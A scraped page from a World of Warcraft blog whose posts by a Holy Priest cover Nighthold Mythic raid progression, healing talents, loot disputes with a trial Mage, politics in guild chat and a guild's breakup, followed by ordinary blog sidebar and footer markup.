through our profile on WoW Progress</a>.</p> <h2>Mages</h2> <p>Most players my age (oh my god, I&#8217;m almost 30) have read Harry Potter at some point. I maintain the belief that just about every guild has that one &#8220;Defense Against the Dark Arts&#8221; class. For whatever reason, that guild has a hard time retaining anyone playing that class (or spec) longer than a few weeks. In our case, it happens to be Mages. We just can&#8217;t get Mages to stick at all regardless of their class.</p> <p>Allow me regale you with a tale of one of our recent Mages.</p> <p>Let&#8217;s call him HelmsDeeps. He came in and trialed with us on Tuesday, which was our standard Heroic clear night. Nothing outstanding there. Wednesday is an optional night that was mostly just to knock out normals and try and complete anyone&#8217;s missing 4 piece sets or get lucky on the titanforging. We usually loot master these to maximize and direct pieces to anyone still missing their bonuses. Mind you, most of the raid group is already sporting Heroic quality tier (915s) and a few with Mythics (930).</p> <p>After many spike eruptions from the floor, bowling ball launches, and that sort, Goroth is cleared. As we&#8217;re distributing loot (and by distributing, I mean mostly disenchanting), HelmsDeeps pipes up wondering why everything is being master looted and if that continues to be the case, he wants to drop out for a chance at the tier helm from Demonic Inquisition and joining a pickup group with personal loot enabled. Our officers gently explain that master looting is how we&#8217;ve always handled these nights to allow for targeted loot. Guess that wasn&#8217;t acceptable to HelmsDeeps and he subsequently dropped raid and then dropped guild. He lasted about a day.</p> <p>The rest of us shrugged and moved on. Clearly he had a different loot and guild philosophy or that he didn&#8217;t comprehend the group that he was raiding with had players who literally did not need a 900 tier helm on the Vanquisher token.</p> <p>Then again, he might&#8217;ve been on to something. After killing Demonic Inquisition, we ended up with two Protector tokens and a Conqueror token. Technically, he made the correct play. But if one of those had been a Vanq, it would&#8217;ve gone to him.</p> <p>Part of me is glad that this was addressed early on. No telling what sort of loot issues might&#8217;ve arisen later had he stayed. For a player to part ways with a guild like that early on in a trial period is actually good for both the player and the guild with neither wasting the other&#8217;s time. As much as I&#8217;m bewildered by the move, at the same time, I can respect how swiftly the player realized that the environment wasn&#8217;t a good fit for their ideals.</p> <p>Anyway, we still have a Mage. Hoping he lasts. The odds don&#8217;t look good right now, sadly.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a>, <a href="http://www.worldofmatticus.com/category/guild-topics/" rel="category tag">Guild Topics</a>, <a href="http://www.worldofmatticus.com/category/guild-topics/raiding-guild-topics/" rel="category tag">Raiding</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-03-04T10:08:27-07:00">March 4, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/arrived-wall-310-mythic/#comments">1 Comment</a></span> </div> <div class="post-wrap"> <div class="post-16255 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/arrived-wall-310-mythic/">We Have Arrived at the Wall: 3/10 Mythic</a></h2> <div class="entry-content"><p>65+ attempts later, we neutralized the Anomaly. After that, we engaged and Trilliax for a few attempts. Just as we were preparing to buckle down for a long night of pulls, he&#8230; uh, fell over. He went down after 6 attempts.</p> <p>The difficulty discrepancy between the second and third bosses is (to quote Khadgar in Hearthstone) astonishing!</p> <p>Next question now is do we pursue Krosus or focus on Spellblade. We did try a few pulls on Krosus and managed to get him down to an average of 60-70% on our better attempts. This one might end up being a defensive cooldown race and I&#8217;m not sure if we have enough just yet. I was trying to map out all the slams. So far, the one that hurts the most is the fifth Slam which happens to coincide with an Orb (and fire elementals, I think).</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-02-22T14:46:25-07:00">February 22, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/mythic-chronomatic-anomaly-wall/#comments">4 Comments</a></span> </div> <div class="post-wrap"> <div class="post-16247 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/mythic-chronomatic-anomaly-wall/">The Mythic Chronomatic Anomaly Wall</a></h2> <div class="entry-content"><p>What a crazy encounter on Mythic. So much burst healing is needed just to get through it. Most guilds seem to be clearing it within 5 minutes. My guild has managed to breach the enraged timer. It does seem like we have the healing chops to keep the group together that long but we&#8217;re still losing out on some DPS. We&#8217;re short maybe 15% somewhere. Thankfully, it looks like the problem&#8217;s been identified.</p> <p>When we initially started it, we split the raid <em>equally</em> to neutralize the 4 ads on both sides of the boss. What we did <em>not</em> do well was bring the boss in to one side and cleave it. It wasn&#8217;t until the end of the night after the raid when someone watched a few kill videos and noticed they had a much larger DPS group on one cleaving into the boss and a skeleton crew on the other to kill the remaining ads at their own pace. We opened with 5 healing but I&#8217;m almost certain we can get to a point where we can do it with 4.</p> <p>This was a thought that occurred to me early on and I wanted to bring it up, but unfortunately there doesn&#8217;t seem to be a clear line of communication to address this in. Anyway, all indications point that Anomaly&#8217;s well within reach for Thursday. The groups will be readjusted with a small interrupt team for one side and the rest of the heavy hitters on the other to maximise as much damage as possible.</p> <p>At least, I hope.</p> <h2>Talent setup</h2> <ul> <li><a href="http://www.wowhead.com/spell=200128/trail-of-light">Trail of Light</a></li> <li><a href="http://www.wowhead.com/spell=121536">Angelic Feather</a></li> <li><a href="http://www.wowhead.com/spell=196707">Afterlife</a></li> <li><a href="http://www.wowhead.com/spell=196985">Light of the Naaru</a></li> <li><a href="http://www.wowhead.com/spell=109186">Surge of Light</a></li> <li><a href="http://www.wowhead.com/spell=197031">Divinity</a></li> <li><a href="http://www.wowhead.com/spell=193157">Benediction</a></li> </ul> <p>Normally, I run <a href="http://www.wowhead.com/spell=197034">Piety</a> instead of Surge of Light, but the Time Release debuff needs to be healed <em>off</em> players or else it&#8217;ll detonate and those Surge procs happen often enough. I needed something fast and responsive particularly if I&#8217;m running from boss to ad.</p> <p>&nbsp;</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-02-21T09:02:45-07:00">February 21, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/politics-in-your-guild/#comments">8 Comments</a></span> </div> <div class="post-wrap"> <div class="post-16244 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/politics-in-your-guild/">Politics in Your Guild?</a></h2> <div class="entry-content"><p>Let&#8217;s get one thing straight. I&#8217;m Canadian and our current government in charge is literally called the Liberal Party of Canada. Our biggest &#8220;scandal&#8221; is the fact that our Prime Minister has decided to not revisit the electoral process (which was one of the platforms he ran on).</p> <p>I don&#8217;t have a problem with political discourse in Warcraft. It happened during the Bush and Obama administrations and it&#8217;s only going to continue going forward. I&#8217;ve witnessed the odd (yet civil) back and forth about the Iraq War and it never devolved into name calling. But for whatever reason, it&#8217;s just more agonizing now when you&#8217;re bustling through Dalaran from your class hall to the flight master. It&#8217;s all non-stop memes and just seems to be highly magnified. It seems every WoW server is a Trump server based on General and Trade Chat metrics (and I&#8217;ve had to disable those channels because it&#8217;s just overwhelming).</p> <p>What gets annoying is when discussion on the guild Discord starts leaning towards the news of the day about how something amazing Trump did or what liberals are pissed off about. I&#8217;ve often thought about interjecting and going &#8220;Actually&#8230;&#8221; but I&#8217;m still new in the guild, I have no desire to rock the boat, and I&#8217;m almost certain any attempt at a reasonable discussion is going to immediately be met with &#8220;LOL LIBRUL TEARS&#8221;. Now, I don&#8217;t for a second believe the entire guild is like that and I think the WoW population is large enough to the point where it can sort of reflect the real national demographic. To me, the game is an escape from reality. It&#8217;s a shame though because they&#8217;re fun players to be around when focused on Mythic Dungeons and the sort. It&#8217;s hard enough finding a guild with the right times, mentality, and progression. Last thing that needs to happen is for guilds to undergo some kind of philosophical or political test.</p> <p>So for the time being, I stay focused on what I need to do. Raiding shouldn&#8217;t be partisan but it does feel demoralizing that I would be thought of as a lesser individual even though I&#8217;m healing what I need to (and can) without compromising myself and dying all the time. I&#8217;ll just have to treat the more outspoken individuals as the crazy uncles around Thanksgiving.</p> <p>Anyway, if you&#8217;re out there reading this and you&#8217;re experiencing something similar, I&#8217;m right there with you. I sympathize with you and I&#8217;m just a northern neighbour.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-02-17T17:51:45-07:00">February 17, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/into-the-nighthold/#comments">3 Comments</a></span> </div> <div class="post-wrap"> <div class="post-16234 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/into-the-nighthold/">Into the Nighthold</a></h2> <div class="entry-content"><p>Hey team, it&#8217;s certainly been a while. I&#8217;m back into the grind again. Actually, I managed to sign with a guild shortly after New Year&#8217;s. I found the guild on Facebook in one of the Warcraft recruiting groups which just happened to be on my server and their progression was close enough to where I left off. <em>Personally</em>, the name doesn&#8217;t do much to inspire me and it reminds me of some vanilla names, but the group seems friendly and focused enough.</p> <p>It&#8217;s called&#8230; *whispers* &lt;<a href="https://www.wowprogress.com/guild/us/kel-thuzad/Ninja+Pirate+Monkeys">Ninja Pirate Monkeys&gt;</a>.</p> <p>Like, how can a monkey be simultaneously a Ninja <em>and</em> a Pirate? It defies all guild naming conventions.</p> <p>Let&#8217;s talk about the guild for a moment because this is the first time in maybe 10 years where I can be <em>just</em> a player. After about a solid month of retooling, we&#8217;re currently 1/10 Mythic in Nighthold! That&#8217;s not bad for a two-night, six hour guild (with optional raid nights during the week or weekend depending on who&#8217;s around). Then again, Mythic Skorpyron feels a tad easier than Heroic Gul&#8217;dan. The loot system&#8217;s handled using EP/GP which is new for me. Only loot system&#8217;s I&#8217;ve experienced before was loot council and DKP (way back in Burning Crusade) so this was an interesting change of pace for me. The nature of World Quest drops, Mythic Dungeons, and Titanforged puts less of an emphasis on raid gear because of the multiple avenues of gear sources. This has the added effect of allowing me to be much more selective on rewards that drop because I might not need an item if I have something close to it from a Mythic Dungeon, for example. Obviously, we can&#8217;t forget the <span style="text-decoration: line-through;">lucky</span> tactical usage of seals for extra rolls.</p> <p>The healing corps at present consists of two Resto Druids, a Holy Priest (me), and a Paladin. I&#8217;m tempted to reinvest into Discipline because there&#8217;s times where I don&#8217;t seem to make a dent compared to the throughput capability of Resto Druids (but my AP&#8217;s only at 46 right now).</p> <p>Every guild seems to have that one kryptonite class. You know, the one class where they can&#8217;t seem to recruit anyone for it or if that class does join, they leave within a week or two? In this case, that class seems to be Mages. I haven&#8217;t had anyone make food in ages. So yes, we&#8217;re recruiting.</p> <p>One thing I&#8217;d like to see of is more structure. I do wish Angry Assignments were used more often for different bosses. Hell, I&#8217;d use it just for myself to write down notes for my own use but I can&#8217;t seem to edit it because I&#8217;m not a rank that has the permissions.</p> <h2>Nighthold Thoughts</h2> <p>How about some thoughts on Nighthold now that it&#8217;s been out for about 4 weeks? It&#8217;s nice to be in a non-dark, well-lit instance especially one that takes place in a part of a city. As for the overall difficulty of the instance, it seems to be just right. I haven&#8217;t progressed too far into Mythic yet so it&#8217;s difficult to say for certain how the rest of it is.</p> <blockquote><p><strong>Skorpyron</strong>: Not that memorable. Your basic introductory boss. The mythic version is much more engaging with the coloured spikes and varied consequences of hiding behind different ones. A little dull for me to heal.</p> <p><strong>Chromatic Anomaly</strong>: Interesting change of pace especially with the slow time and fast time built in. Throws off my timing especially during slow time. Otherwise, straight forward and tolerable healing-wise.</p> <p><strong>Trilliax</strong>: It&#8217;s the beam phase. Go too fast one way and Trilliax can change directions and before you know it, a quarter of the rate is lightsaber&#8217;d in half with no chance of recovery. Thankfully, encounter itself seems to be forgiving. I like jumping on the Roombas before they detonate. Fun!</p> <p><strong>Aluriel</strong>: Fun to heal! Frost phase is the most tense for me just due to the number of things that can go wrong. Sometimes a person who just got a bomb collides with someone who had the bomb for much longer so the timing&#8217;s off. Ideally, I wish players with equal timings would run into each other instead.</p> <p><strong>Krosus</strong>: Also fun to heal. Nice sense of urgency applied with the gradual reduction in raid platform. Aside from the occasional player getting sniped from his beams, there&#8217;s a nice amount of damage that just gets thrown around with the slams.</p> <p><strong>Tichondrius</strong>: Challenging encounter. This isn&#8217;t one I look forward to at all. Always worried about missing the purple pool buffs because it seems to spawn on the green fire. Collisions can be scary especially if players just run in to detonate them before the raid is at a sustainable health level.</p> <p><strong>High Botanist Tel&#8217;arn</strong>: Fun to heal! Multi-phase fight means you need to keep track of different abilities that are occurring at different times. Slow buildup that crescendos into a chaos filled final phase.</p> <p><strong>Star Augur Etraeus</strong>: Actually, I really like the special effects and the background of the encounter with the different backdrops and skies. Visually stunning. I appreciate it more during moments where I can safely take a moment to look up. Though, those moments aren&#8217;t often</p> <p><strong>Grand Magistrix Elisande</strong>: More dependant on your DPS nailing the blue and red elementals at the right time to ensure that you have the necessary slows and buffs for the rings.</p> <p><strong>Gul&#8217;dan</strong>: One of the better end bosses I&#8217;ve experienced. Lots of awareness needed with the eyes. Placement matters so you don&#8217;t get thrown off the ledge. Reminds me of the ol&#8217; Lich King encounter. The final phase and the dealing with the souls is one of the more tense parts of a fight I had to heal through. First phase is a little annoying though.</p></blockquote> <p>During one of the Elisande kills, I found myself with the <a href="http://www.wowhead.com/item=140805/ephemeral-paradox&amp;bonus=3514">Ephemeral Paradox</a> trinket.  It seems to only work on the following healing spells:</p> <ul> <li><b>Holy Priest</b>: Heal</li> <li><b>Discipline Priest</b>: Shadow Mend</li> <li><b>Holy Paladin</b>: Holy Light</li> <li><b>Resto Druid</b>: Healing Touch</li> <li><b>Resto Shaman</b>: Healing Wave</li> <li><b>Mistweaver Monk</b>: Effuse</li> </ul> <p>Yeah, casting Heal for that mana return takes just way too much time. You have to make a calculated risk on whether that extra second on Heal is worth it. In a raid group with Resto Druids, by the time the heal lands, the Rejuvs will already have done their jobs. Any player with lower health (like 25% health) generally needs healing <em>right now</em> and Heal isn&#8217;t fast enough nor strong enough to get that wounded player back to a healthy level. In my opinion, for a regen trinket, it seems pretty weak. I just need to get lucky on a high Titanforged <a href="http://www.wowhead.com/item=136714/amalgams-seventh-spine">Amalgam&#8217;s Seventh Spine</a> drop.</p> <p>Feels off to be writing again. But, it&#8217;s like riding a bike.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2016-11-18T09:02:53-07:00">November 18, 2016</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/back-free-agency-47-mythic-just-not-enough/#comments">1 Comment</a></span> </div> <div class="post-wrap"> <div class="post-16224 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/back-free-agency-47-mythic-just-not-enough/">Back to Free Agency &#8212; 4/7 Mythic Just not Enough</a></h2> <div class="entry-content"><p>The first three months of any guild&#8217;s inception are usually the toughest. If they can stick around and be cohesive for that long, then the guild&#8217;s odds of making it through for the rest of the expansion are usually in their favour.</p> <p>Unfortunately, I am disappointed to say that Integrity stopped just two weeks shy of that benchmark.</p> <p>Losing 1-2 players a week due to attrition is manageable. Losing 3-4 every so often is like losing 20% of your team and that&#8217;s usually much more difficult to recover from. Though the GM tried his best, he lacked the drive to keep going and had already burned out &#8212; Not necessarily due to the game, but due to the players.</p> <h3>The Post Mortem</h3> <p>If there&#8217;s a case study to be had here, the underlying lessons here would be <strong>to set and manage player expectations</strong>.</p> <p>It definitely seemed that most players had their own idea of what direction the guild should go and how things should be handled. To a GM, that can be overwhelming to parse out what&#8217;s relevant and what isn&#8217;t. Here&#8217;s two of the most common opinions that I heard about:</p> <ul> <li><strong>&#8220;We should be raiding Mythic on Tuesdays and not Heroics.&#8221;</strong>Mythic requires 20 players, period. If 20 isn&#8217;t an option, then Mythics isn&#8217;t an option. Second, players can still benefit from trinkets from select bosses. In the weeks leading up until now, it was only a 90 minute investment from first pull to finalizing loot distribution from Xavius (out of a 9 hour raid week). Granted, we disenchanted perhaps 3 out of 4 items that dropped but that didn&#8217;t mean there weren&#8217;t legitimate upgrades. Once one player was done with Heroic and no longer needed anything else, they seemed to possess a &#8220;Screw &#8217;em, I got my loot&#8221; mentality which is dangerous and does not align with a guild first philosophy.<strong>Answer</strong>: My solution here would be to take a close look at what bosses players needed and target them exclusively. Ursoc and Illy trinkets were still in high demand. Going after Nythendra, Ursoc, and Illy and then backing out and switching to Mythics right away would have been an adequate compromise between those hellbent on progression and those who still needed upgrades. We did this too late though. Even then, when we did, it wasn&#8217;t enough. I would have banked Heroics for later in the week as an option if we didn&#8217;t have enough for Mythics.</li> <li><strong>&#8220;That player sucks, kick them.&#8221;</strong>Vendettas appear to be a real thing in a virtual game. Personally, my belief is that a player needs to worry about their own performance first and foremost before examining someone else. If a player&#8217;s performance is lacking, it&#8217;s up to the leadership to try to address it. But at the same time, the raid is subject to the reality and logistics of Mythic raiding &#8212; If you have exactly 20 players, and one of them isn&#8217;t firing on all cylinders, dropping one of them means you&#8217;re not going to be able to do Mythic at full strength unless you want to pursue it short handed. It&#8217;s almost always better to try to address and identify player performance problems because the cost of finding a new player, training them up, and gearing them to the appropriate level can be just as costly.<strong>Answer</strong>: Removal from a guild should only be used for the most egregious of offences. However, I am of the opinion that if a player is having an off night, telling them to take a seat for maybe 2 or 3 pulls to get their stuff together is not a bad idea. Consistency is a huge part of the game. If you give the ball to Steph Curry, you expect him to make those 3 pointers on a night to night basis. If the same player is the first to die on every pull when they normally don&#8217;t, that&#8217;s a problem. Steps should be silently taken to continue recruiting but the guild can&#8217;t advance without fresh players coming into the organization. We didn&#8217;t do a good enough job of recognizing  and addressing that. This lead to player frustration because of the <em>perception</em> that we didn&#8217;t see or want to do anything about it. The reality is that we did see it, but we were handcuffed due to the logistics and restrictions of Mythics. In most cases, it seems that of the three important attributes of a player, they only possess two of them: Attendance, game awareness, and high DPS.</li> </ul> <h3>Next Move</h3> <p>I&#8217;m officially a free agent. I&#8217;m heading out of town over the Thanksgiving weekend and will be back early December. I hear Chicago&#8217;s nice this time of year (and I&#8217;m really stoked to watch Hamilton). Once I&#8217;m back home, I can get back to guild hunting and pounding pavement. Faction changing is off the table so I&#8217;d rather stay Alliance. Weekday evenings strongly preferred. Realistically, I&#8217;m at the point in my raiding career where I&#8217;m okay with <em>not</em> having to be a starter. I find myself caring less and less about being one of the first to secure a progression kill. Obviously if I can help contribute, I&#8217;d be delighted to do that. I&#8217;m just as comfortable coming in later on a farm night or to help provide healing relief for a healer that needs to take a night. As long as I still get to participate and see the kill at all, right?</p> <p>Anyone have a lead for an 878 Alliance Holy Priest?</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="navigation"><div class="pagination-next alignright"><a href="http://www.worldofmatticus.com/page/2/" >Next Page &#x000BB;</a></div></div></div><div id="sidebar" class="sidebar widget-area"><div id="enews-ext-2" class="widget enews-widget"><div class="widget-wrap"><div class="enews"><h4 class="widget-title widgettitle">Subscribe!</h4> <p>Join the 8,000+ Warcraft players who get their news, tips, and opinions straight from World of Matticus.</p> <form id="subscribe-enews-ext-2" action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open( 'http://feedburner.google.com/fb/a/mailverify?uri=WorldOfMatticus', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true" name="enews-ext-2"> <label for="subbox" class="screenread">Enter your email address...</label><input type="text" value="" id="subbox" placeholder="Enter your email address..." name="email" /> <input type="hidden" name="uri" value="WorldOfMatticus" /> <input type="hidden" name="loc" value="en_US" /> <input type="submit" value="Go" id="subbutton" /> </form> </div></div></div> <div id="text-439087005" class="widget widget_text"><div class="widget-wrap"><h4 class="widget-title widgettitle">Superior</h4> <div class="textwidget"><div id="pf_21473" class="pf_ads"><script src="http://load.passionfruitads.com/a/33b109e9360f4c30f0381f055f60b84529203d67.js"></script></div></div> </div></div> <div id="search-4" class="widget widget_search"><div class="widget-wrap"><form method="get" class="searchform search-form" action="http://www.worldofmatticus.com/" role="search" ><input type="text" value="Search this website &#x02026;" name="s" class="s search-input" onfocus="if ('Search this website &#x2026;' === this.value) {this.value = '';}" onblur="if ('' === this.value) {this.value = 'Search this website &#x2026;';}" /><input type="submit" class="searchsubmit search-submit" value="Search" /></form></div></div> <div id="linkcat-18" class="widget widget_links"><div class="widget-wrap"><h4 class="widget-title widgettitle">Recommended</h4> <ul class='xoxo blogroll'> <li><a href="http://eyesofthebeast.com/" title="Adam Koebel, former hunter columnist at WoW Insider">Eyes of the Beast (Hunters)</a></li> <li><a href="http://www.guildmasters.org" title="Matt&#8217;s new blog for GMs, raid leaders, and officers">Guildmasters</a></li> <li><a href="http://kurn.apotheosis-now.com">Kurn&#039;s Corner</a></li> <li><a href="http://www.lifeingroup5.com">Life in Group 5</a></li> <li><a href="http://manalicious.wordpress.com/" title="Vidyala, former Mage Columnist for WoW Insider">Manalicious (Mages)</a></li> <li><a href="http://wow.joystiq.com/bloggers/matt-low/">Matt @ WoW Insider</a></li> <li><a href="http://redhattedrogue.wordpress.com/" title="Rfeann, former Rogue columnist for WoW Insider">Red Hatted Rogue</a></li> <li><a href="http://www.restokin.com/">Restokin</a></li> <li><a href="http://rhida.ch/" title="Rhidach, former WoW Insider columnist">Righteous Defense (Protection Paladins)</a></li> <li><a href="http://talesofapriest.com/">Tales of a Priest</a></li> <li><a href="http://bossypally.wordpress.com">The Bossy Pally</a></li> <li><a href="http://www.leetsauced.com/">The LeetSauced Podcast</a></li> <li><a href="http://www.toomanyannas.com/" title="Resto Shaman blog by Anna">Too Many Annas</a></li> <li><a href="http://totemspot.com/">TotemSpot</a></li> </ul> </div></div> <div id="text-439087006" class="widget widget_text"><div class="widget-wrap"><h4 class="widget-title widgettitle">Epic</h4> <div class="textwidget"><div id="pf_21472" class="pf_ads"><script src="http://load.passionfruitads.com/a/5defda2cb650eed6701451c186c93658880c7864.js"></script></div></div> </div></div> <div id="text-439087008" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><script type="text/javascript"><!-- google_ad_client = "ca-pub-7143823084903928"; /* Skyscraper */ google_ad_slot = "8478967715"; google_ad_width = 120; google_ad_height = 600; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script></div> </div></div> </div></div></div></div><div id="footer-widgets" class="footer-widgets"><div class="wrap"><div class="widget-area footer-widgets-1 footer-widget-area"><div id="text-439087003" class="widget widget_text"><div class="widget-wrap"><h4 class="widget-title widgettitle">About me</h4> <div class="textwidget"><p><img src="http://www.worldofmatticus.com/wp-content/uploads/2015/11/about-front.jpg"></p> <p> My name is Matticus and this is my World of Warcraft blog. Here you can read about my thoughts regarding healing as a priest. As a former guild master, I also write about guild and raid related topics. The blog has expanded to include thoughts from other regular contributors. The aim of this blog is to help you grow and improve. My unending goal is to have something relevant and useful in every post. or more, you can check out my columns on <a href="http://blizzardwatch.com/author/mlow/">Blizzard Watch</a>. Visit the<a href="http://www.guildmasters.org">Guildmasters</a> to talk shop with other GMs, raid leaders, and officers. My current guild is <Ninja Pirate Monkeys> on Kel'Thuzad US.<p></div> </div></div> </div><div class="widget-area footer-widgets-2 footer-widget-area"> <div id="recent-posts-4" class="widget widget_recent_entries"><div class="widget-wrap"> <h4 class="widget-title widgettitle">Recent Posts</h4> <ul> <li> <a href="http://www.worldofmatticus.com/five-months-later-new-expansion/">Five Months Later and a New Expansion</a> </li> <li> <a href="http://www.worldofmatticus.com/hellooo-argus/">Hellooo Argus!</a> </li> <li> <a href="http://www.worldofmatticus.com/dear-friends/">Dear Friends</a> </li> <li> <a href="http://www.worldofmatticus.com/sisters-can-real-pain/">Sisters Can be a Real Pain</a> </li> <li> <a href="http://www.worldofmatticus.com/a-tale-of-magery/">A Tale of Magery</a> </li> </ul> </div></div> <div id="text-439087007" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- WoM - Footer --> <ins class="adsbygoogle" style="display:inline-block;width:250px;height:250px" data-ad-client="ca-pub-7143823084903928" data-ad-slot="4775579314"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <a href="http://www.worldofmatticus.com/advertise/">Advertise</a></div> </div></div> </div><div class="widget-area footer-widgets-3 footer-widget-area"><div id="search-5" class="widget widget_search"><div class="widget-wrap"><h4 class="widget-title widgettitle">Search</h4> <form method="get" class="searchform search-form" action="http://www.worldofmatticus.com/" role="search" ><input type="text" value="Search this website &#x02026;" name="s" class="s search-input" onfocus="if ('Search this website &#x2026;' === this.value) {this.value = '';}" onblur="if ('' === this.value) {this.value = 'Search this website &#x2026;';}" /><input type="submit" class="searchsubmit search-submit" value="Search" /></form></div></div> <div id="tag_cloud-3" class="widget widget_tag_cloud"><div class="widget-wrap"><h4 class="widget-title widgettitle">Tags</h4> <div class="tagcloud"><a href="http://www.worldofmatticus.com/tag/31/" class="tag-cloud-link tag-link-1114 tag-link-position-1" style="font-size: 8.2616822429907pt;" aria-label="3.1 (18 items)">3.1</a> <a href="http://www.worldofmatticus.com/tag/beta/" class="tag-cloud-link tag-link-629 tag-link-position-2" style="font-size: 9.3084112149533pt;" aria-label="beta (22 items)">beta</a> <a href="http://www.worldofmatticus.com/tag/blog/" class="tag-cloud-link tag-link-136 tag-link-position-3" style="font-size: 13.102803738318pt;" aria-label="blog (44 items)">blog</a> <a href="http://www.worldofmatticus.com/tag/blogging/" class="tag-cloud-link tag-link-100 tag-link-position-4" style="font-size: 9.9626168224299pt;" aria-label="Blogging (25 items)">Blogging</a> <a href="http://www.worldofmatticus.com/tag/cataclysm/" class="tag-cloud-link tag-link-1430 tag-link-position-5" style="font-size: 13.88785046729pt;" aria-label="cataclysm (50 items)">cataclysm</a> <a href="http://www.worldofmatticus.com/tag/disc/" class="tag-cloud-link tag-link-1012 tag-link-position-6" style="font-size: 12.317757009346pt;" aria-label="disc (38 items)">disc</a> <a href="http://www.worldofmatticus.com/tag/discipline/" class="tag-cloud-link tag-link-309 tag-link-position-7" style="font-size: 14.803738317757pt;" aria-label="discipline (59 items)">discipline</a> <a href="http://www.worldofmatticus.com/tag/dps/" class="tag-cloud-link tag-link-619 tag-link-position-8" style="font-size: 8.2616822429907pt;" aria-label="dps (18 items)">dps</a> <a href="http://www.worldofmatticus.com/tag/druid/" class="tag-cloud-link tag-link-46 tag-link-position-9" style="font-size: 14.280373831776pt;" aria-label="Druid (54 items)">Druid</a> <a href="http://www.worldofmatticus.com/tag/gear/" class="tag-cloud-link tag-link-147 tag-link-position-10" style="font-size: 11.663551401869pt;" aria-label="gear (34 items)">gear</a> <a href="http://www.worldofmatticus.com/tag/gm/" class="tag-cloud-link tag-link-142 tag-link-position-11" style="font-size: 9.3084112149533pt;" aria-label="GM (22 items)">GM</a> <a href="http://www.worldofmatticus.com/tag/guild/" class="tag-cloud-link tag-link-143 tag-link-position-12" style="font-size: 18.728971962617pt;" aria-label="guild (119 items)">guild</a> <a href="http://www.worldofmatticus.com/tag/heal/" class="tag-cloud-link tag-link-357 tag-link-position-13" style="font-size: 17.028037383178pt;" aria-label="heal (88 items)">heal</a> <a href="http://www.worldofmatticus.com/tag/healing/" class="tag-cloud-link tag-link-728 tag-link-position-14" style="font-size: 19.906542056075pt;" aria-label="healing (148 items)">healing</a> <a href="http://www.worldofmatticus.com/tag/heroic/" class="tag-cloud-link tag-link-106 tag-link-position-15" style="font-size: 12.448598130841pt;" aria-label="Heroic (39 items)">Heroic</a> <a href="http://www.worldofmatticus.com/tag/holy/" class="tag-cloud-link tag-link-239 tag-link-position-16" style="font-size: 15.327102803738pt;" aria-label="holy (65 items)">holy</a> <a href="http://www.worldofmatticus.com/tag/leadership/" class="tag-cloud-link tag-link-670 tag-link-position-17" style="font-size: 10.878504672897pt;" aria-label="leadership (29 items)">leadership</a> <a href="http://www.worldofmatticus.com/tag/loot/" class="tag-cloud-link tag-link-60 tag-link-position-18" style="font-size: 11.663551401869pt;" aria-label="loot (34 items)">loot</a> <a href="http://www.worldofmatticus.com/tag/matticus/" class="tag-cloud-link tag-link-639 tag-link-position-19" style="font-size: 11.663551401869pt;" aria-label="matticus (34 items)">matticus</a> <a href="http://www.worldofmatticus.com/tag/mimetir/" class="tag-cloud-link tag-link-1601 tag-link-position-20" style="font-size: 11.009345794393pt;" aria-label="Mimetir (30 items)">Mimetir</a> <a href="http://www.worldofmatticus.com/tag/mists-of-pandaria/" class="tag-cloud-link tag-link-2163 tag-link-position-21" style="font-size: 11.009345794393pt;" aria-label="mists of pandaria (30 items)">mists of pandaria</a> <a href="http://www.worldofmatticus.com/tag/naxxramas-raid-strategy/" class="tag-cloud-link tag-link-2443 tag-link-position-22" style="font-size: 9.3084112149533pt;" aria-label="Naxxramas (22 items)">Naxxramas</a> <a href="http://www.worldofmatticus.com/tag/paladin/" class="tag-cloud-link tag-link-38 tag-link-position-23" style="font-size: 